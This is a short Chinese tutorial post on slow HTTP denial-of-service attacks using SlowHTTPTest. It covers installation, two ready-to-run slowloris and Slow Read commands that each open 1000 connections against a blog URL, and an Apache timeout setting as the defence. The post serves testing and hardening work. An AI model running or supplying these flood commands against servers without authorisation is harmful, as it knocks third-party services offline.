首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >浅谈慢速DOS攻击与防御

浅谈慢速DOS攻击与防御

作者头像
逍遥子大表哥
发布2025-12-31 10:56:54
发布2025-12-31 10:56:54
940
举报
文章被收录于专栏:kali blogkali blog

SlowHTTPTest是一款对服务器进行慢攻击的测试软件,所谓的慢攻击就是相对于cc或者DDoS的快而言的,并不是只有量大速度快才能把服务器搞挂,使用慢攻击有时候也能到达同一效果。

slowhttptest包含了之前几种慢攻击的攻击方式,包括slowloris, Slow HTTP POST, Slow Read attack等。那么这些慢攻击工具的原理就是想办法让服务器等待,当服务器在保持连接等待时,自然就消耗了资源。

在kali中安装

在kali中,我们可以用apt命令直接进行安装。

代码语言:javascript
复制
apt-get install slowhttptest 

其他系统安装

代码语言:javascript
复制
tar -xzvf slowhttptest-x.x.tar.gz
cd slowhttptest-x.x
./configure --prefix=PREFIX
make
sudo make install

查看帮助

代码语言:javascript
复制
slowhttptest -h 

使用示例

警告!!!以下仅在测试环境进行实验,坚决反对一切危害网络安全的行为。slowloris模式:

代码语言:javascript
复制
slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://blog.bbskali.cn/index.html -x 24 -p 3

service available显示为NO时。证明已经成功。

Slow Read模式:

代码语言:javascript
复制
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u https://blog.bbskali.cn/index.html

如何防御

这里我们以apache为例 修改apache的配置文件httpd.conf

首先启用reqtimeout_module modules模块。默认已经启动,如果没有启动删掉前面的#号就行了。

然后,添加下面代码

代码语言:javascript
复制
<IfModule reqtimeout_module>
    RequestReadTimeout header=5-40,MinRate=500 body=20,MinRate=500
</IfModule>

更多精彩文章 欢迎关注我们

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-12-19,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 kali笔记 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 在kali中安装
  • 其他系统安装
  • 查看帮助
  • 使用示例
  • 如何防御
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档